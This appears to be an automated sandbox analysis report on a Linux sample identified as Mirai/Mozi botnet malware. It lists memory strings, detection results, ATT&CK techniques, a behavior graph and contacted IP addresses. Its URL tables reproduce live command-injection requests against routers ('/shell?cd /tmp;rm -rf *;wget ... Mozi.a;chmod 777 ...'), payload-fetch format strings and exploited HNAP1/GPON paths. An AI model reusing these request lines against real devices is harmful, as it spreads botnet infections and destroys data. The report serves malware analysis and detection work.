                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: set the elf interpreter prefix to 'path'set the stack size to 'size' bytesselect CPU (-cpu help for list)sets targets environment variable (see below)unsets targets environment variable (see below)forces target process argv[0] to be 'argv0'set qemu uname release string to 'uname'set guest_base address to 'address'reserve 'size' bytes for guest virtual address spaceenable logging of specified items (use '-d help' for a list of items)write logs to 'logfile' (default stderr)set the host page size to 'pagesize'Seed for pseudo-random number generatordisplay version information and exit-%s %-*s %-*s %s
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: QEMU_STACK_SIZE
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_opts_id
                            Source: kvm-test-1-run.sh.8.drBinary or memory string: if kill -0 $qemu_pid > /dev/null 2>&1
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_opt_set_bool
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_ether_ntoa
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_opt_set_number
                            Source: kvm-test-1-run.sh.8.drBinary or memory string: qemu_args=$5
                            Source: functions.sh0.8.drBinary or memory string: echo -device spapr-vlan,netdev=net0,mac=$TORTURE_QEMU_MAC
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: init_qemu_uname_release
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/qapi/qmp-input-visitor.c
                            Source: functions.sh0.8.drBinary or memory string: echo qemu-system-x86_64
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: C/build/qemu-tYeErX/qemu-2.5+dfsg/util/unicode.c
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_thread_atexit_remove
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_mutex_lock
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_mutex_iothread_locked
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: QEMU_GDB
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_opts_print_help
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_unregister_reset
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_stamp_bb41a07c541f07aa6886cb62996d065ebf1fe025
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/qobject/qfloat.c
                            Source: kvm-test-1-run.sh.8.drBinary or memory string: BOOT_IMAGE="`identify_boot_image $QEMU`"
                            Source: functions.sh0.8.drBinary or memory string: if test -n "$TORTURE_QEMU_INTERACTIVE"
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_event_set
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: QEMU_LD_PREFIX
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: QEMU_SET_ENV
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu: no user program specified
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_fd_getpagesize
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_real_host_page_size
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/qobject/qlist.c
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: QEMU: Terminated via GDBstub
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_free_irq
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: QEMU_LOG
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: print this helpQEMU_GDBwait gdb connection to 'port'QEMU_LD_PREFIXQEMU_STACK_SIZEQEMU_CPUmodelQEMU_SET_ENVvar=valueQEMU_UNSET_ENVQEMU_ARGV0argv0QEMU_UNAMEunameQEMU_GUEST_BASEQEMU_RESERVED_VAQEMU_LOGitem[,...]QEMU_LOG_FILENAMElogfileQEMU_PAGESIZEpagesizesinglestepQEMU_SINGLESTEPrun in singlestep modestracelog system callsseedQEMU_VERSION/etc/qemu-binfmt/armdo_strex/build/qemu-tYeErX/qemu-2.5+dfsg/linux-user/syscall.c*arg_type == (int)STRUCT_rtentry%lx-%lx %c%c%c%c %lx %x:%x %d %512s%08x-%08x %c%c%c%c %08lx %02x:%02x %d %s%s
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/util/cutils.c
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/hw/core/nmi.c
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /etc/qemu-binfmt/arm
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/qobject/json-parser.c
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/target-arm/op_helper.c
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/util/module.c
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/util/mmap-alloc.c
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/linux-user/mmap.ch2g_valid(ptr)ret == 0h2g_valid(host_start)h2g_valid(host_addr)target_mremaptarget_mmapmmap_find_vmacore dumpedqemu: uncaught target signal %d (%s) - %s
                            Source: bin.sh, 6777.1.00007ffda3af7000.00007ffda3b18000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-arm/tmp/bin.shLANG=en_US.UTF-8TERM=xtermLANGUAGE=en_USMAIL=/var/mail/rootSUDO_USER=userPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:0.0SHELL=/bin/bashSUDO_COMMAND=/bin/bashSUDO_UID=1000HOME=/home/userUSERNAME=rootCOLORTERM=xfce4-terminalLOGNAME=rootXAUTHORITY=/home/user/.XauthorityUSER=rootSUDO_GID=1000/tmp/bin.sh
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_strtosz
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: QEMU_VERSION
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: QEMU_GUEST_BASE
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_event_destroy
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_opts_parse
                            Source: functions.sh0.8.drBinary or memory string: # identify_boot_image qemu-cmd
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_opts_from_qdict_1
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu: could not open gdbserver on port %d
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_opts_to_qdict
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_host_page_mask
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_opts_print
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/cpu-exec.c
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_mutex_unlock
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_irq_invert
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_parse_fd
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: QEMU_PAGESIZE
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/qapi/qmp-output-visitor.c
                            Source: functions.sh0.8.drBinary or memory string: if test -n "$TORTURE_QEMU_CMD"
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_daemon
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: You can use -E and -U options or the QEMU_SET_ENV and
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: QEMU_LD_PREFIX = %s
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_cond_broadcast
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/util/rcu.crcu_reader.ctr == 0call_rcurcu_register_thread/build/qemu-tYeErX/qemu-2.5+dfsg/qobject/json-lexer.clexer->state <= ARRAY_SIZE(json_lexer)json_lexer_feed_char
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: attempt to add duplicate property '%s' to object (type '%s')Insufficient permission to perform this operation/build/qemu-tYeErX/qemu-2.5+dfsg/include/qapi/qmp/qobject.hInvalid parameter type for '%s', expected: %sProperty %s on %s is not '%s' enum typechild object is already parentedPath '%s' does not uniquely identify an objectinfo->name != NULL!enumerating_typeschild<struct tmtm_yeartm_montm_mdaytm_hourtm_mintm_sectype->parent_type != NULLtarget_type%s::%s<=info->parent>=size >= type->instance_sizetype->abstract == falseobj->ref > 0==obj->ref == 0Property '.%s' not found!obj || obj->refcntobj->type != NULLobj->type->destroy != NULLstringbooleancontainer/objectschild<%s>invalid object type: %sobject type '%s' is abstractuser-creatablelink<%s>objobj->parent != NULL%s/%spartsDevice '%s' not foundlink%sobject_resolve_path_typeobject_get_canonical_path_componentobject_resolve_linkobject_property_add_childobject_property_get_enumobject_property_get_intobject_property_get_boolobject_property_get_linkobject_property_get_strqobject_decrefobject_property_setobject_property_getobject_property_delobject_property_findobject_property_addobject_finalizeobject_unrefobject_set_propvobject_new_with_propvobject_new_with_typetype_get_parenttype_is_ancestortype_initializeobject_initialize_with_typetype_table_addtype_newtype_register/build/qemu-tYeErX/qemu-2.5+dfsg/qom/container.cparts != NULL && parts[0] != NULL && !parts[0][0]container_get/build/qemu-tYeErX/qemu-2.5+dfsg/qom/object_interfaces.cuser_creatable_can_be_deleteduser_creatable_complete/build/qemu-tYeErX/qemu-2.5+dfsg/crypto/aes.cin && out && keyin && out && key && ivecAES_cbc_encryptAES_decryptAES_encrypt
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_mutex_init
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/include/qemu/rcu.h

                            Stealing of Sensitive Information:

                            barindex
                            Yara detected MiraiShow sources
                            Source: Yara matchFile source: 6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp, type: MEMORY
                            Source: Yara matchFile source: 6821.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp, type: MEMORY
                            Source: Yara matchFile source: 6790.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp, type: MEMORY
                            Source: Yara matchFile source: dump.pcap, type: PCAP
                            Source: Yara matchFile source: bin.sh, type: SAMPLE
                            Source: Yara matchFile source: 6777.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmp, type: MEMORY
                            Source: Yara matchFile source: 6821.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmp, type: MEMORY
                            Source: Yara matchFile source: 6790.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: bin.sh PID: 6777, type: MEMORYSTR
                            Source: Yara matchFile source: /usr/networks, type: DROPPED

                            Remote Access Functionality:

                            barindex
                            Yara detected MiraiShow sources
                            Source: Yara matchFile source: 6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp, type: MEMORY
                            Source: Yara matchFile source: 6821.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp, type: MEMORY
                            Source: Yara matchFile source: 6790.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp, type: MEMORY
                            Source: Yara matchFile source: dump.pcap, type: PCAP
                            Source: Yara matchFile source: bin.sh, type: SAMPLE
                            Source: Yara matchFile source: 6777.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmp, type: MEMORY
                            Source: Yara matchFile source: 6821.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmp, type: MEMORY
                            Source: Yara matchFile source: 6790.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: bin.sh PID: 6777, type: MEMORYSTR
                            Source: Yara matchFile source: /usr/networks, type: DROPPED

                            Mitre Att&ck Matrix

                            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                            Valid AccountsScripting2.bash_profile and .bashrc1.bash_profile and .bashrc1Masquerading1OS Credential Dumping1Security Software Discovery11Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Standard Port11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                            Default AccountsAt (Linux)1Kernel Modules and Extensions1Kernel Modules and Extensions1File and Directory Permissions Modification1LSASS MemoryRemote System Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                            Domain AccountsAt (Linux)At (Linux)1At (Linux)1Scripting2Security Account ManagerSystem Network Configuration Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol4Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSFile and Directory Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol4SIM Card SwapCarrier Billing Fraud
                            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsSystem Information Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

                            Malware Configuration

                            No configs have been found

                            Behavior Graph

                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Number of created Files
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 522924 Sample: bin.sh Startdate: 16/11/2021 Architecture: LINUX Score: 100 91 67.154.225.218, 49152 XO-AS15US United States 2->91 93 165.136.72.146, 23 WISCNET1-ASUS United States 2->93 95 103 other IPs or domains 2->95 99 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->99 101 Antivirus detection for dropped file 2->101 103 Antivirus / Scanner detection for submitted sample 2->103 105 4 other signatures 2->105 12 bin.sh 2->12         started        14 upstart sh 2->14         started        16 upstart sh 2->16         started        18 upstart sh 2->18         started        signatures3 process4 process5 20 bin.sh 12->20         started        22 sh date 14->22         started        24 sh apport-checkreports 14->24         started        26 sh date 16->26         started        28 sh apport-gtk 16->28         started        30 sh date 18->30         started        32 sh apport-gtk 18->32         started        process6 34 bin.sh 20->34         started        file7 83 /usr/sbin/alsa-info.sh, ASCII 34->83 dropped 85 /usr/networks, ELF 34->85 dropped 87 /usr/bin/gettext.sh, ASCII 34->87 dropped 89 21 other malicious files 34->89 dropped 107 Sample tries to persist itself using /etc/profile 34->107 109 Drops files in suspicious directories 34->109 111 Sample reads /proc/mounts (often used for finding a writable filesystem) 34->111 113 Sample tries to persist itself using System V runlevels 34->113 38 bin.sh 34->38         started        41 bin.sh sh 34->41         started        43 bin.sh sh 34->43         started        45 30 other processes 34->45 signatures8 process9 signatures10 119 Opens /proc/net/* files useful for finding connected devices and routers 38->119 47 bin.sh sh 38->47         started        49 bin.sh sh 38->49         started        51 bin.sh sh 38->51         started        62 5 other processes 38->62 53 sh killall 41->53         started        56 sh iptables 43->56         started        58 sh iptables 45->58         started        60 sh iptables 45->60         started        64 21 other processes 45->64 process11 signatures12 66 sh iptables 47->66         started        69 sh iptables 49->69         started        71 sh iptables 51->71         started        115 Terminates several processes with shell command 'killall' 53->115 117 Executes the "iptables" command to insert, remove and/or manipulate rules 56->117 73 sh iptables 62->73         started        75 sh iptables 62->75         started        77 sh iptables 62->77         started        79 2 other processes 62->79 process13 signatures14 97 Executes the "iptables" command to insert, remove and/or manipulate rules 66->97 81 iptables modprobe 66->81         started        process15

                            Antivirus, Machine Learning and Genetic Malware Detection

                            Initial Sample

                            SourceDetectionScannerLabelLink
                            bin.sh54%MetadefenderBrowse
                            bin.sh75%ReversingLabsLinux.Trojan.Mirai
                            bin.sh100%AviraLINUX/Mirai.lldau

                            Dropped Files

                            SourceDetectionScannerLabelLink
                            /usr/networks100%AviraLINUX/Mirai.lldau
                            /usr/networks54%MetadefenderBrowse
                            /usr/networks75%ReversingLabsLinux.Trojan.Mirai

                            Domains

                            No Antivirus matches

                            URLs

                            SourceDetectionScannerLabelLink
                            http://52.54.104.1:80/HNAP1/0%Avira URL Cloudsafe
                            http://pastebin.ca)0%Avira URL Cloudsafe
                            http://122.201.116.141:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://%s:%d/bin.sh;chmod0%Avira URL Cloudsafe
                            http://%s:%d/Mozi.a;chmod0%Avira URL Cloudsafe
                            http://127.0.0.1:80/GponForm/diag_Form?images/0%Avira URL Cloudsafe
                            http://%s:%d/Mozi.m;$0%Avira URL Cloudsafe
                            http://216.180.103.7:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://127.0.0.10%Avira URL Cloudsafe
                            http://201.49.41.72:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://www.alsa-project.org0%Avira URL Cloudsafe
                            http://%s:%d/Mozi.m0%Avira URL Cloudsafe
                            http://www.alsa-project.org/cardinfo-db/0%Avira URL Cloudsafe
                            http://127.0.0.1sendcmd0%URL Reputationsafe
                            http://112.74.206.52:80/HNAP1/0%Avira URL Cloudsafe
                            http://%s:%d/Mozi.m;/tmp/Mozi.m0%Avira URL Cloudsafe
                            http://221.128.175.114:80/HNAP1/0%Avira URL Cloudsafe
                            http://%s:%d/bin.sh0%Avira URL Cloudsafe
                            http://purenetworks.com/HNAP1/0%URL Reputationsafe
                            http://www.alsa-project.org/alsa-info.sh0%Avira URL Cloudsafe
                            http://%s:%d/Mozi.m;0%Avira URL Cloudsafe
                            http://www.alsa-project.org.0%Avira URL Cloudsafe
                            http://3.113.149.148:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://HTTP/1.10%Avira URL Cloudsafe
                            http://%s:%d/Mozi.a;sh$0%Avira URL Cloudsafe
                            http://175.119.69.229:80/HNAP1/0%Avira URL Cloudsafe

                            Domains and IPs

                            Contacted Domains

                            NameIPActiveMaliciousAntivirus DetectionReputation
                            dht.transmissionbt.com
                            		87.98.162.88
                            		truefalse
                              		high
                              bttracker.acc.umu.se
                              		130.239.18.158
                              		truefalse
                                		high
                                router.bittorrent.com
                                		67.215.246.10
                                		truefalse
                                  		high
                                  router.utorrent.com
                                  		82.221.103.244
                                  		truefalse
                                    		high
                                    bttracker.debian.org
                                    		unknown
                                    		unknownfalse
                                      		high

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      http://52.54.104.1:80/HNAP1/true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://122.201.116.141:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawstrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://127.0.0.1:80/GponForm/diag_Form?images/true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://216.180.103.7:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawstrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://201.49.41.72:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawstrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://112.74.206.52:80/HNAP1/true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://221.128.175.114:80/HNAP1/true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://3.113.149.148:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawstrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://175.119.69.229:80/HNAP1/true
                                      • Avira URL Cloud: safe
                                      		unknown

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      http://pastebin.ca)alsa-info.sh0.8.drfalse
                                      • Avira URL Cloud: safe
                                      		low
                                      http://%s:%d/bin.sh;chmodbin.sh, 6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmptrue
                                      • Avira URL Cloud: safe
                                      		low
                                      http://%s:%d/Mozi.a;chmodbin.sh, 6777.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		low
                                      http://schemas.xmlsoap.org/soap/encoding/bin.sh, 6777.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmp, bin.sh, 6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmpfalse
                                        		high
                                        http://%s:%d/Mozi.m;$bin.sh, 6777.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		low
                                        http://schemas.xmlsoap.org/soap/envelope/bin.sh, 6777.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmp, bin.sh, 6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmpfalse
                                          		high
                                          http://127.0.0.1bin.sh, 6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://baidu.com/%s/%s/%d/%s/%s/%s/%s)bin.sh, 6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmpfalse
                                            		high
                                            http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/.config.8.drfalse
                                              		high
                                              http://www.alsa-project.orgalsa-info.sh0.8.drfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.pastebin.ca/upload.phpalsa-info.sh0.8.drfalse
                                                		high
                                                http://%s:%d/Mozi.mbin.sh, 6777.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		low
                                                http://www.alsa-project.org/cardinfo-db/alsa-info.sh0.8.drfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://127.0.0.1sendcmdbin.sh, 6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmpfalse
                                                • URL Reputation: safe
                                                		low
                                                http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEYalsa-info.sh0.8.drfalse
                                                  		high
                                                  http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblahalsa-info.sh0.8.drfalse
                                                    		high
                                                    http://ipinfo.io/ipbin.sh, 6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmpfalse
                                                      		high
                                                      http://%s:%d/Mozi.m;/tmp/Mozi.mbin.sh, 6777.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		low
                                                      http://%s:%d/bin.shbin.sh, 6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmptrue
                                                      • Avira URL Cloud: safe
                                                      		low
                                                      http://www.pastebin.caalsa-info.sh0.8.drfalse
                                                        		high
                                                        http://purenetworks.com/HNAP1/bin.sh, 6777.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.alsa-project.org/alsa-info.shalsa-info.sh0.8.drfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://%s:%d/Mozi.m;bin.sh, 6777.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		low
                                                        http://www.alsa-project.org.alsa-info.sh0.8.drfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://HTTP/1.1bin.sh, 6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		low
                                                        http://%s:%d/Mozi.a;sh$bin.sh, 6777.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		low
                                                        http://www.pastebin.ca.alsa-info.sh0.8.drfalse
                                                          		high
                                                          http://schemas.xmlsoap.org/soap/envelope//bin.sh, 6777.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmpfalse
                                                            		high

                                                            Contacted IPs

                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs

                                                            Public

                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            94.203.207.167
                                                            		unknownUnited Arab Emirates
                                                            		15802DU-AS1AEfalse
                                                            22.89.26.204
                                                            		unknownUnited States
                                                            		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                            195.142.249.103
                                                            		unknownTurkey
                                                            		34984TELLCOM-ASTRfalse
                                                            85.44.173.79
                                                            		unknownItaly
                                                            		3269ASN-IBSNAZITfalse
                                                            203.76.80.94
                                                            		unknownJapan9622KCTKurashikiCableTVJPfalse
                                                            172.47.177.11
                                                            		unknownUnited States
                                                            		21928T-MOBILE-AS21928USfalse
                                                            221.121.67.245
                                                            		unknownAustralia
                                                            		9509DESE-AS-APDepartmentofEducationSkillsandEmploymentAUfalse
                                                            197.103.198.60
                                                            		unknownSouth Africa
                                                            		3741ISZAfalse
                                                            84.216.74.60
                                                            		unknownSweden
                                                            		2119TELENOR-NEXTELTelenorNorgeASNOfalse
                                                            147.239.8.164
                                                            		unknownUnited States
                                                            		1452DNIC-ASBLK-01451-01456USfalse
                                                            27.219.31.91
                                                            		unknownChina
                                                            		4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                                                            118.241.131.48
                                                            		unknownJapan2527SO-NETSo-netEntertainmentCorporationJPfalse
                                                            114.245.131.177
                                                            		unknownChina
                                                            		4808CHINA169-BJChinaUnicomBeijingProvinceNetworkCNfalse
                                                            221.136.35.240
                                                            		unknownChina
                                                            		4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                                                            97.109.239.27
                                                            		unknownCanada
                                                            		20453RCCI-WIRELESSCAfalse
                                                            166.65.80.38
                                                            		unknownNew Zealand
                                                            		58681NSWPOLSERV-AS-APNewSouthWalesPoliceAUfalse
                                                            76.217.46.172
                                                            		unknownUnited States
                                                            		7018ATT-INTERNET4USfalse
                                                            4.252.44.159
                                                            		unknownUnited States
                                                            		3356LEVEL3USfalse
                                                            193.48.239.12
                                                            		unknownFrance
                                                            		2200FR-RENATERReseauNationaldetelecommunicationspourlaTecfalse
                                                            77.72.157.219
                                                            		unknownNetherlands
                                                            		20857TRANSIP-ASAmsterdamtheNetherlandsNLfalse
                                                            174.111.86.95
                                                            		unknownUnited States
                                                            		11426TWC-11426-CAROLINASUSfalse
